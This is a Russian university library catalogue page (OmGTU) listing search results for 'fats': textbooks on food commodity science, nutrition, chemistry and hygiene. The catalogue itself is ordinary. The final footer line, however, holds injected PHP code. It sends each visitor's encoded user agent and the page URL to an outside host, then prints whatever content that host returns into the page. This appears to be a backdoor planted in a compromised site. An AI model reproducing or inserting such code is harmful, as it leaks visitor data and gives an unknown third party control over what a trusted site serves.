Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

321 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЖИРЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 26
1. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2011. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

2. 
Хомченко, Гавриил Платонович. Сборник задач по химии для поступающих в вузы [Текст] / Г. П. Хомченко, И. Г. Хомченко, 2005. - 278 с.
Держатели документа (Информация об экземплярах) 

Сборник включает задачи по общей, неорганической и органической химии. Последний раздел пособия содержит задачи повышенной трудности. В каждом разделе приводятся задачи с решениями.

Книга предназначена поступающим в вузы. Она также может быть рекомендована преподавателям химии при подготовке учащихся к сдаче выпускных экзаменов за курс средней школы.

3. 
Цветков, Леонид Александрович. Органическая химия [Текст] / Л. А. Цветков, 1969. - 239, [1] с.
Держатели документа (Информация об экземплярах) 
4. 
Рево, Александр Яковлевич. Практикум по органической химии. Качественные микрохимические реакции [Текст] / А. Я. Рево, 1971. - 206 с.
Держатели документа (Информация об экземплярах) 
5. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2013. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

6. 
Общая физическая подготовка в рамках самостоятельных занятий студентов [Текст] / М. С. Эммерт [и др.], 2017. - 110 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Пособие дополняет и развивает практический курс "Физическая культура", в нем рассмотрен один из разделов программы - методико-практический. Освещены вопросы методики самостоятельных занятий физическими упражнениями; самоконтроля физического развития и функционального состояния организма; укрепления здоровья; повышения работоспособности и других методик.

Адресовано студентам вузов, преподавателям, а также всем, кто занимается физическими упражнениями самостоятельно.

Полный текст
7. 
Питание и общество. - Журнал, 2009г. № 10
Оглавление 
  • Курбанов, Н. Комбинированный белково-витаминный салат из огородного портулака / Н. Курбанов, Д. Аскерова. - с.24-25
    Кл. слова: САЛАТ, ПОРТУЛАК
  • Филонов, М. "Зерно пророка" подарило нам кефир / М. Филонов. - с.26-27
    Кл. слова: КЕФИР
  • Разнообразие теста. - с.27
    Кл. слова: ТЕСТО СЛОЕНОЕ, ТЕСТО ПЕСОЧНОЕ
  • Морозова, Т. Жиры-мутанты / Т. Морозова. - с.28
    Кл. слова: трансжиры
  • Остаться на бобах... Не так уж плохо!. - с.29
    Кл. слова: ФАСОЛЬ, БОБЫ
  • Мироевская, Н. В пивном ресторане - стиль особый / Н. Мироевская. - с.32-33
    Кл. слова: ОДЕЖДА обслуживающего персонала
8. 
Хаят, Давид. Антираковая диета: Продукты, которые мы должны есть, чтобы защититься от опасного недуга [Текст] / Д. Хаят ; пер. О. А. Кутумина, 2017. - 285, [] с.
Держатели документа (Информация об экземплярах) 
9. 
Экспертиза масел, жиров и продуктов их переработки. Качество и безопасность [Текст] / Е. П. Корнена [и др.] ; ред. В. М. Позняковский ; дар. О. Д. Худякова, 2007. - 269, [1] с.
Держатели документа (Информация об экземплярах) 

Пособие входит в серию "Экспертиза пищевых продуктов и продовольственного сырья". Содержит наиболее полный учебно-справочный материал по вопросам качества, безопасности и экспертизе масел, жиров и продуктов их переработки.

Представлена следующая информация по рассматриваемой группе пищевых продуктов: основные понятия, классификация, ассортимент и товароведная характеристика, технология производства, экспертиза качества и безопасности (органолептические, физико-химические, микробиологические показатели, дефекты, идентификация), упаковка, маркировка, транспортирование и хранение.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлениям и специальностям указанного пищевого профиля.

Имеет практическую значимость для работников пищевой и перерабатывающей промышленности, специалистов экспертных (инспекционных, оценочных) организаций, органов по сертификации, испытательных лабораторий, аудиторских и сюрвейерских фирм, занимающихся вопросами качества и безопасности продуктов питания.

10. 
Молчанова Е. Н. Физиология питания [Текст] / Е. Н. Молчанова, 2014. - 240 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- ПИЩЕВАРЕНИЕ -- ОБМЕН ЭНЕРГЕТИЧЕСКИЙ -- ЭНЕРГОТРАТЫ ОРГАНИЗМА ЧЕЛОВЕКА -- МИКРОНУТРИЕНТЫ -- МАКРОНУТРИЕНТЫ -- БЕЛКИ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- КОМПОНЕНТЫ ПИЩИ -- ЦЕННОСТЬ ПИЩЕВАЯ -- МОЛОКО - ПИТАНИЕ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ -- ЯЙЦА - ПИТАНИЕ -- ЯЙЦЕПРОДУКТЫ - ПИТАНИЕ -- МЯСО - ПИТАНИЕ -- ПТИЦА - ПИТАНИЕ -- ПРОДУКТЫ МЯСНЫЕ - ПИТАНИЕ -- РЫБА - ПИТАНИЕ -- МОРЕПРОДУКТЫ - ПИТАНИЕ -- ЗЕРНО - ПИТАНИЕ -- ОВОЩИ - ПИТАНИЕ -- ФРУКТЫ - ПИТАНИЕ -- ЯГОДЫ - ПИТАНИЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ - ПИТАНИЕ -- ТЕОРИЯ ПИТАНИЯ НАУЧНАЯ -- ПИТАНИЕ НЕТРАДИЦИОННОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ

В учебном пособии изложены основы физиологии пищеварения, значение и функции органов пищеварительной системы, энергетического обмена. Рассмотрены биологическая роль и значение в питании макро- и микронутриентов, биологически активных веществ. Проанализированы различные теории питания и даны научные основы дифференциального питания для отдельных групп населения.

Для студентов высших учебных заведений, обучающихся по специальности "Технология продукции и организация общественного питания" и "Продукты питания из растительного сырья".

11. 
Скрипко, Тамара Васильевна. Химия [Текст] / Т. В. Скрипко, О. Т. Тимошенко, 2013. - 260 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

Содержит рекомендации по проведению лабораторных опытов, демонстрационного эксперимента по важнейшим разделам общей, неорганической и органической химии. Дана методика выполнения работ научно-исследовательского характера.

К каждой работе приведены контрольные вопросы, которые помогут более глубоко разобраться в сущности эксперимента и связанных с ним теоретических положений. Справочный материал помещен в приложении.

Предназначено для студентов всех форм обучения, осваивающих общую, неорганическую и органическую химию.

Полный текст
12. 
Петровский, Константин Семенович. Гигиена питания [Текст] : учеб. для санитар.-гигиен. фак. мед. ин-тов / К. С. Петровский, 1975. - 399, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
14. 
Бренц, Мелита Яновна. Жиры и их использование в питании [Текст] / М. Я. Бренц, 1973. - 64, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Бирюкова, Вера Васильевна. Товароведение продовольственных товаров [Текст] : конспект лекций / В. В. Бирюкова, Н. В. Шевченко, 2008. - 32 с.
Ключевые слова 
Оглавление 
  • Введение. - с.3
  • Основы товароведения продовольственных товаров. - с.3
  • Состояние и перспективы развития рынка продовольственных товаров. - с.3
  • Химический состав продовольственных товаров. - с.3
  • Общие сведения о продовольственных товарах. - с.3
  • Особенности оценки качества продовольственных товаров. - с.7
  • Качество пищевых продуктов. - с.7
  • Управление качеством продовольственных товаров при хранении и реализации. - с.9
  • Основы хранения продовольственных товаров. - с.9
  • Кодирование продовольственных товаров. - с.10
  • Сертификация продовольственных товаров. - с.11
  • Сертификация товаров. - с.11
  • Экспертиза товаров. - с.12
  • Товароведная характеристика продовольственных товаров однородных групп. - с.13
  • Зерномучные товары. - с.13
  • Плодоовощные товары. - с.14
  • Вкусовые товары. - с.15
  • Кондитерские товары. - с.17
  • Пищевые жиры. - с.19
  • Молочные товары. - с.22
  • Яичные товары. - с.24
  • Мясные товары. - с.25
  • Рыбные товары. - с.28
  • Библиографический список. - с.31
Держатели документа (Информация об экземплярах) 

Рассмотрены основные вопросы о продовольственных товарах, <качества> <пищевых> <продуктов>, групп продуктов, <кодирование> продовольственных товаров, <сертификация>, <экспертиза> товаров.

Полный текст
16. 
Бирюкова, Вера Васильевна. Санитария и гигиена [Текст] : учеб. пособие / В. В. Бирюкова, Н. В. Шевченко, 2011. - 76 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
17. 
Холодильная технология пищевых продуктов [Текст] : учеб. для вузов по специальности 260504 (270800) "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов социального назначения и общественного питания" и магист. программе 260100.68 (552418) "Холодильная технология пищевых продуктов": в 3 ч. Ч. 2 : Технологические основы / В. И. Филиппов [и др.], 2008. - 571, [1] с.
Держатели документа (Информация об экземплярах) 

Во второй части учебника "Холодильная технология пищевых продуктов" рассматриваются технологические аспекты процессов холодильного консервирования пищевых продуктов. Изложены состав и свойства пищевых продуктов, значение микроорганизмов при холодильном консервировании, технологические режимы холодильной обработки, отепления, размораживания, условия хранения и транспортирования различных видов сырья и продуктов их переработки. Приведены технические средства, применяемые в современной холодильной технологии пищевых продуктов.

18. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
19. 
Скрипко, Тамара Васильевна. Химия [Текст] : лаб. практикум / Т. В. Скрипко, О. Т. Тимошенко, 2012. - 254 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

Содержит рекомендации по проведению лабораторных опытов, демонстрационного эксперимента по важнейшим разделам общей, неорганической и органической химии.

К каждой работе приведены контрольные вопросы, которые помогут более глубоко разобраться в сущности эксперимента и связанных с ним теоретических положений. Справочный материал помещен в приложении.

Полный текст
20. 
Глинка, Николай Леонидович. Общая химия [Электронный ресурс] : учеб. для нехим. специальностей вузов / Н. Л. Глинка ; под ред. В. А. Попкова, В. А., А. В. Бабкова, 2011. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 

Изложены теоретические и практические основы курса общей химии. Большое внимание уделено строению атомов и молекул, закономерностям протекания химических реакций. В настоящем переработанном и дополненном издании выделены в самостоятельные главы органические соединения и дисперсные системы, расширен материал по биохимии и проблемам взаимодействия человека с окружающей средой.

Легендарный учебник, переведенный на многие языки стран Европы, Азии, Африки и выпущенный общим тиражом свыше 5 миллионов экземпляров, в новой редакции.

Содержание учебника соответствует государственному стандарту высшего профессионального образования и методическим требованиям, предъявляемым к учебным изданиям.

21. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3225 - 08.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.17 с.14 запросов, 0.54c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;